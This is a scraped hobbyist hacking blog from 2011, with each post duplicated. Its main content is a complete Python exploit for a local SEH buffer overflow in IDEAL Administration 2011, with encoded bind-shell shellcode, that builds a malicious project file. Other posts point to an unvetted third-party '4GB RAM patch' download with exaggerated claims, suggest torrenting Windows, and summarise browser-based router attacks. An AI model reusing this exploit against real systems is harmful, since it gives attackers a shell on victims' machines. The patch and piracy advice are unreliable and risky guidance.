Friday, November 11, 2011
Friday, September 30, 2011
New Forum Website check it out
This is a new website that yall should help join and get it up and running
www.eugenikz.info
go and register and help the community!
www.eugenikz.info
go and register and help the community!
Tuesday, September 27, 2011
PhreePhiles needs your help.
i am currently taking donations of any amount to help support a program to give kids laptops for their schooling, if you would like to donate please click on the donate button... the kids and I will be very thankful...
Sunday, July 31, 2011
How to access more than 4GB ram in x32/x86 arch.
Now most people will try to tell you that this is not possible, that all you can do is enable the /PAE switch in the boot.ini file, this is wronge.
Microsoft OS does have the capability to overcome this addressing issue but it is disabled for some odd reason only known to MS. this is done by ram lock registry keys and some kernel work as well, im going to show your a program that takes care of this without modifying any kernel code or messing up your current Operating System [gives you the option to boot up the patched kernel in the boot phase, but its exactly like you were booting your non-patched OS]
now all you have to do is download the 4gb-patch in the link at the end of this post.
Run the program as administrator and click, check for updates, then click patch x86 ram lock if no updates are available,
wait for the program to let you know its been finnished then reboot your system.
now on the boot screen you will see two options its most likely the first choise, itll say windows 7 ddr [some crap in german], press enter on that one,
now check out your ram in the controlpanel and in the task manager. now you can run upto 64GB RAM on an x32/x86 arch.
note: this only works in windows 7 for some reason.
and its dosnt always work either, i have another matchine and it never works even with another patcher. im still working on this BTW.
download link: http://www.4shared.com/file/ao3tPw_F/4GB-RAMPatch-Multilingual-1272.html
Microsoft OS does have the capability to overcome this addressing issue but it is disabled for some odd reason only known to MS. this is done by ram lock registry keys and some kernel work as well, im going to show your a program that takes care of this without modifying any kernel code or messing up your current Operating System [gives you the option to boot up the patched kernel in the boot phase, but its exactly like you were booting your non-patched OS]
now all you have to do is download the 4gb-patch in the link at the end of this post.
Run the program as administrator and click, check for updates, then click patch x86 ram lock if no updates are available,
wait for the program to let you know its been finnished then reboot your system.
now on the boot screen you will see two options its most likely the first choise, itll say windows 7 ddr [some crap in german], press enter on that one,
now check out your ram in the controlpanel and in the task manager. now you can run upto 64GB RAM on an x32/x86 arch.
note: this only works in windows 7 for some reason.
and its dosnt always work either, i have another matchine and it never works even with another patcher. im still working on this BTW.
download link: http://www.4shared.com/file/ao3tPw_F/4GB-RAMPatch-Multilingual-1272.html
HP mini Secrets
Today I am going to show you the hidden secrets of the hp mini 210, and its intel atom N450,
the atom N450 apparently supports hyper threading and x64 arch. This is something hp and Microsoft neglects to tell you, hp also doesn’t have any support for the x64 based windows OS on the hp mini, but today im going to show you how to set it up so the basics of your mini will work
hidden things
the intel Atom can not support more than 2GB ram [I have not tested this out yet but hopefully soon, I know for a fact 2GB does work, I just upgraded the ram this morning]
x64 based windows drivers are not at all available for the hp mini 210, I have no idea why hp packages this netbook with a 32 bit operating system [windows 7 starter]
hyper-threading, when I first got this netbook hyper threading was disabled, I didn’t even know it was capable of this but it is, there’s a slight boost nut nothing big,
now behind the battery there is a sim card slot for 3G, I don’t know if a 3g modem is embedded inside the chip set but I do know there’ss an empty PCIe slot inside the netbook were we can put a modem
now these are not the new netbooks that are advertised as 3g ready, so hp all in all if you have bought an hp mini 210 and you want to upgrade to make it almost as powerful as a laptop just follow the instructions
1. download a x64 version of windows 7 [Google “windows 7 x64 torrent]
2. set up a virtual hard disk, set how much space you want the new windows install to have and format the space to NTFS.
3. Burn the windows ISO to a DVD [make sure its boot able] I recommend googling the phrase “Microsoft usb/DVD creator” a lot easier
4. plug in your usb/DVD and then restart and boot from the device, choose the partition you just created.
5. Now go to the hp website and go to your computers driver section and download the drivers [might need to do this from another computer seeing as how you will not have internet drivers yet] install them, they worked fine for me
6. now press the windows key and r and type msconfig and go too boot, then click advanced boot options, now enable the CPU check box by clicking it and then choose the highest number of CPUs, you just enabled hyper threading click apply and ok then restart
you now have your net book to its full capability, enjoy. if i need to update this i will.
the atom N450 apparently supports hyper threading and x64 arch. This is something hp and Microsoft neglects to tell you, hp also doesn’t have any support for the x64 based windows OS on the hp mini, but today im going to show you how to set it up so the basics of your mini will work
hidden things
the intel Atom can not support more than 2GB ram [I have not tested this out yet but hopefully soon, I know for a fact 2GB does work, I just upgraded the ram this morning]
x64 based windows drivers are not at all available for the hp mini 210, I have no idea why hp packages this netbook with a 32 bit operating system [windows 7 starter]
hyper-threading, when I first got this netbook hyper threading was disabled, I didn’t even know it was capable of this but it is, there’s a slight boost nut nothing big,
now behind the battery there is a sim card slot for 3G, I don’t know if a 3g modem is embedded inside the chip set but I do know there’ss an empty PCIe slot inside the netbook were we can put a modem
now these are not the new netbooks that are advertised as 3g ready, so hp all in all if you have bought an hp mini 210 and you want to upgrade to make it almost as powerful as a laptop just follow the instructions
1. download a x64 version of windows 7 [Google “windows 7 x64 torrent]
2. set up a virtual hard disk, set how much space you want the new windows install to have and format the space to NTFS.
3. Burn the windows ISO to a DVD [make sure its boot able] I recommend googling the phrase “Microsoft usb/DVD creator” a lot easier
4. plug in your usb/DVD and then restart and boot from the device, choose the partition you just created.
5. Now go to the hp website and go to your computers driver section and download the drivers [might need to do this from another computer seeing as how you will not have internet drivers yet] install them, they worked fine for me
6. now press the windows key and r and type msconfig and go too boot, then click advanced boot options, now enable the CPU check box by clicking it and then choose the highest number of CPUs, you just enabled hyper threading click apply and ok then restart
you now have your net book to its full capability, enjoy. if i need to update this i will.
Tuesday, March 29, 2011
IDEAL Administration 2011 v11.4 Local SEH Buffer Overflow Exploit
#!/usr/bin/env python
#################################################################
#
# IDEAL Administration 2011 v11.4 Local SEH Buffer Overflow Exploit
# Found By: Dr_IDE
# Usage: Migrate -> Open Migration Project -> Bind Shell
# Download: www.pointdev.com
# Tested On: Windows XPSP3
# Notes: Another version, another exploit... come on guys.
#
#################################################################
# windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444
sc = (
"\x89\xe2\xdb\xcc\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x42\x4a\x4a\x4b\x50\x4d\x4b\x58\x4b\x49\x4b\x4f\x4b"
"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x46\x44\x4c\x4b"
"\x50\x45\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x43\x31\x4a"
"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x45\x51"
"\x4a\x4b\x50\x49\x4c\x4b\x47\x44\x4c\x4b\x45\x51\x4a\x4e\x50"
"\x31\x49\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x44\x34\x43\x37"
"\x49\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47"
"\x4b\x50\x54\x46\x44\x46\x48\x44\x35\x4b\x55\x4c\x4b\x51\x4f"
"\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
"\x4d\x59\x42\x4c\x47\x54\x45\x4c\x43\x51\x49\x53\x50\x31\x49"
"\x4b\x43\x54\x4c\x4b\x47\x33\x46\x50\x4c\x4b\x47\x30\x44\x4c"
"\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f"
"\x4e\x36\x45\x36\x46\x33\x43\x56\x45\x38\x47\x43\x46\x52\x42"
"\x48\x43\x47\x42\x53\x46\x52\x51\x4f\x50\x54\x4b\x4f\x48\x50"
"\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x48"
"\x56\x51\x4f\x4d\x59\x4b\x55\x45\x36\x4b\x31\x4a\x4d\x43\x38"
"\x45\x52\x46\x35\x43\x5a\x45\x52\x4b\x4f\x48\x50\x45\x38\x49"
"\x49\x44\x49\x4a\x55\x4e\x4d\x51\x47\x4b\x4f\x48\x56\x51\x43"
"\x51\x43\x51\x43\x51\x43\x46\x33\x51\x53\x50\x53\x47\x33\x51"
"\x43\x4b\x4f\x4e\x30\x42\x46\x43\x58\x42\x31\x51\x4c\x45\x36"
"\x46\x33\x4b\x39\x4d\x31\x4c\x55\x45\x38\x4e\x44\x44\x5a\x42"
"\x50\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x44\x50\x50\x51"
"\x50\x55\x4b\x4f\x48\x50\x45\x38\x49\x34\x4e\x4d\x46\x4e\x4a"
"\x49\x46\x37\x4b\x4f\x4e\x36\x50\x53\x46\x35\x4b\x4f\x48\x50"
"\x43\x58\x4b\x55\x47\x39\x4c\x46\x50\x49\x46\x37\x4b\x4f\x48"
"\x56\x46\x30\x50\x54\x50\x54\x46\x35\x4b\x4f\x4e\x30\x4c\x53"
"\x42\x48\x4b\x57\x44\x39\x48\x46\x44\x39\x50\x57\x4b\x4f\x48"
"\x56\x51\x45\x4b\x4f\x4e\x30\x42\x46\x43\x5a\x42\x44\x42\x46"
"\x43\x58\x43\x53\x42\x4d\x4c\x49\x4b\x55\x43\x5a\x46\x30\x51"
"\x49\x51\x39\x48\x4c\x4d\x59\x4d\x37\x42\x4a\x51\x54\x4b\x39"
"\x4a\x42\x50\x31\x49\x50\x4a\x53\x4e\x4a\x4b\x4e\x50\x42\x46"
"\x4d\x4b\x4e\x50\x42\x46\x4c\x4a\x33\x4c\x4d\x43\x4a\x47\x48"
"\x4e\x4b\x4e\x4b\x4e\x4b\x45\x38\x42\x52\x4b\x4e\x4e\x53\x42"
"\x36\x4b\x4f\x42\x55\x47\x34\x4b\x4f\x49\x46\x51\x4b\x50\x57"
"\x51\x42\x50\x51\x46\x31\x50\x51\x43\x5a\x43\x31\x50\x51\x50"
"\x51\x51\x45\x50\x51\x4b\x4f\x48\x50\x42\x48\x4e\x4d\x48\x59"
"\x45\x55\x48\x4e\x50\x53\x4b\x4f\x49\x46\x42\x4a\x4b\x4f\x4b"
"\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
"\x48\x44\x45\x34\x4b\x4f\x49\x46\x50\x52\x4b\x4f\x4e\x30\x45"
"\x38\x4a\x50\x4d\x5a\x43\x34\x51\x4f\x51\x43\x4b\x4f\x4e\x36"
"\x4b\x4f\x4e\x30\x41\x41")
head = ("\x0D\x0A\x5B\x47\x72\x6F\x75\x70\x2C\x45\x78\x70\x6F\x72\x74\x2C\x59\x65\x73\x5D\x0D\x0A"); # Project Header
buff = ("\x43\x6f\x6d\x70\x75\x74\x65\x72\x3D" + "\x41" * 2432); # XPSP3 EIP Overwrite
nseh = ("\xEB\x06\x90\x90"); # NSEH
retn = ("\x10\x77\xA0\x02"); # P/P/R ULMigrate_us.dll XPSP3
nops = ("\x90" * 16);
foot = ("\x0D\x0A\x5B\x45\x6E\x64\x5D\x0D\x0A");
try:
print "[*] Generating Evil Migrate File..."
f1 = open("unIDEAL.ipj","w");
f1.write(head + buff + nseh + retn + nops + sc + foot);
f1.close();
print "[*] File created successfully!"
except:
print "[-] There was a problem writing the file."
#################################################################
#
# IDEAL Administration 2011 v11.4 Local SEH Buffer Overflow Exploit
# Found By: Dr_IDE
# Usage: Migrate -> Open Migration Project -> Bind Shell
# Download: www.pointdev.com
# Tested On: Windows XPSP3
# Notes: Another version, another exploit... come on guys.
#
#################################################################
# windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444
sc = (
"\x89\xe2\xdb\xcc\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x4b\x4c\x42\x4a\x4a\x4b\x50\x4d\x4b\x58\x4b\x49\x4b\x4f\x4b"
"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x46\x44\x4c\x4b"
"\x50\x45\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x43\x31\x4a"
"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x45\x51"
"\x4a\x4b\x50\x49\x4c\x4b\x47\x44\x4c\x4b\x45\x51\x4a\x4e\x50"
"\x31\x49\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x44\x34\x43\x37"
"\x49\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47"
"\x4b\x50\x54\x46\x44\x46\x48\x44\x35\x4b\x55\x4c\x4b\x51\x4f"
"\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
"\x4d\x59\x42\x4c\x47\x54\x45\x4c\x43\x51\x49\x53\x50\x31\x49"
"\x4b\x43\x54\x4c\x4b\x47\x33\x46\x50\x4c\x4b\x47\x30\x44\x4c"
"\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f"
"\x4e\x36\x45\x36\x46\x33\x43\x56\x45\x38\x47\x43\x46\x52\x42"
"\x48\x43\x47\x42\x53\x46\x52\x51\x4f\x50\x54\x4b\x4f\x48\x50"
"\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x48"
"\x56\x51\x4f\x4d\x59\x4b\x55\x45\x36\x4b\x31\x4a\x4d\x43\x38"
"\x45\x52\x46\x35\x43\x5a\x45\x52\x4b\x4f\x48\x50\x45\x38\x49"
"\x49\x44\x49\x4a\x55\x4e\x4d\x51\x47\x4b\x4f\x48\x56\x51\x43"
"\x51\x43\x51\x43\x51\x43\x46\x33\x51\x53\x50\x53\x47\x33\x51"
"\x43\x4b\x4f\x4e\x30\x42\x46\x43\x58\x42\x31\x51\x4c\x45\x36"
"\x46\x33\x4b\x39\x4d\x31\x4c\x55\x45\x38\x4e\x44\x44\x5a\x42"
"\x50\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x44\x50\x50\x51"
"\x50\x55\x4b\x4f\x48\x50\x45\x38\x49\x34\x4e\x4d\x46\x4e\x4a"
"\x49\x46\x37\x4b\x4f\x4e\x36\x50\x53\x46\x35\x4b\x4f\x48\x50"
"\x43\x58\x4b\x55\x47\x39\x4c\x46\x50\x49\x46\x37\x4b\x4f\x48"
"\x56\x46\x30\x50\x54\x50\x54\x46\x35\x4b\x4f\x4e\x30\x4c\x53"
"\x42\x48\x4b\x57\x44\x39\x48\x46\x44\x39\x50\x57\x4b\x4f\x48"
"\x56\x51\x45\x4b\x4f\x4e\x30\x42\x46\x43\x5a\x42\x44\x42\x46"
"\x43\x58\x43\x53\x42\x4d\x4c\x49\x4b\x55\x43\x5a\x46\x30\x51"
"\x49\x51\x39\x48\x4c\x4d\x59\x4d\x37\x42\x4a\x51\x54\x4b\x39"
"\x4a\x42\x50\x31\x49\x50\x4a\x53\x4e\x4a\x4b\x4e\x50\x42\x46"
"\x4d\x4b\x4e\x50\x42\x46\x4c\x4a\x33\x4c\x4d\x43\x4a\x47\x48"
"\x4e\x4b\x4e\x4b\x4e\x4b\x45\x38\x42\x52\x4b\x4e\x4e\x53\x42"
"\x36\x4b\x4f\x42\x55\x47\x34\x4b\x4f\x49\x46\x51\x4b\x50\x57"
"\x51\x42\x50\x51\x46\x31\x50\x51\x43\x5a\x43\x31\x50\x51\x50"
"\x51\x51\x45\x50\x51\x4b\x4f\x48\x50\x42\x48\x4e\x4d\x48\x59"
"\x45\x55\x48\x4e\x50\x53\x4b\x4f\x49\x46\x42\x4a\x4b\x4f\x4b"
"\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
"\x48\x44\x45\x34\x4b\x4f\x49\x46\x50\x52\x4b\x4f\x4e\x30\x45"
"\x38\x4a\x50\x4d\x5a\x43\x34\x51\x4f\x51\x43\x4b\x4f\x4e\x36"
"\x4b\x4f\x4e\x30\x41\x41")
head = ("\x0D\x0A\x5B\x47\x72\x6F\x75\x70\x2C\x45\x78\x70\x6F\x72\x74\x2C\x59\x65\x73\x5D\x0D\x0A"); # Project Header
buff = ("\x43\x6f\x6d\x70\x75\x74\x65\x72\x3D" + "\x41" * 2432); # XPSP3 EIP Overwrite
nseh = ("\xEB\x06\x90\x90"); # NSEH
retn = ("\x10\x77\xA0\x02"); # P/P/R ULMigrate_us.dll XPSP3
nops = ("\x90" * 16);
foot = ("\x0D\x0A\x5B\x45\x6E\x64\x5D\x0D\x0A");
try:
print "[*] Generating Evil Migrate File..."
f1 = open("unIDEAL.ipj","w");
f1.write(head + buff + nseh + retn + nops + sc + foot);
f1.close();
print "[*] File created successfully!"
except:
print "[-] There was a problem writing the file."
Saturday, February 19, 2011
How hackers Find You.
Firewall penetration using javascript
Using javascript on a Web site, you can make someone's router port-forward any port back to them. This software forces any port that might normally be restricted to become open to attack, and leaves the door open for hackers. Worse yet, users might not even know it's happening.
Browser protocol confusion
Hackers can fool a browser into thinking it is using HTTP protocol (normally uses for Web browsing) when in fact it's using a different protocol such as FTP or IRC. This in turn confuses the router on a network and forces it to open ports that might normally be restricted.
Businesses should run strict firewalls to prevent this type of attack, with limited outbound connections. Running an end-point based firewall could also prevent this attack.
Browser-based geo-location harvesting
A malicious Web site can use a browser to learn some information about a user's network with no authentication required. The browser then sends information to an attacker, who asks Google where the original user lives. Google has this data because they correlate network locations with GPS coordinates, collected during their Street View mapping.
http://www.itbusiness.ca/it/client/en/home/News.asp?id=59914&PageMem=2
Using javascript on a Web site, you can make someone's router port-forward any port back to them. This software forces any port that might normally be restricted to become open to attack, and leaves the door open for hackers. Worse yet, users might not even know it's happening.
Browser protocol confusion
Hackers can fool a browser into thinking it is using HTTP protocol (normally uses for Web browsing) when in fact it's using a different protocol such as FTP or IRC. This in turn confuses the router on a network and forces it to open ports that might normally be restricted.
Businesses should run strict firewalls to prevent this type of attack, with limited outbound connections. Running an end-point based firewall could also prevent this attack.
Browser-based geo-location harvesting
A malicious Web site can use a browser to learn some information about a user's network with no authentication required. The browser then sends information to an attacker, who asks Google where the original user lives. Google has this data because they correlate network locations with GPS coordinates, collected during their Street View mapping.
http://www.itbusiness.ca/it/client/en/home/News.asp?id=59914&PageMem=2
Subscribe to:
Posts (Atom)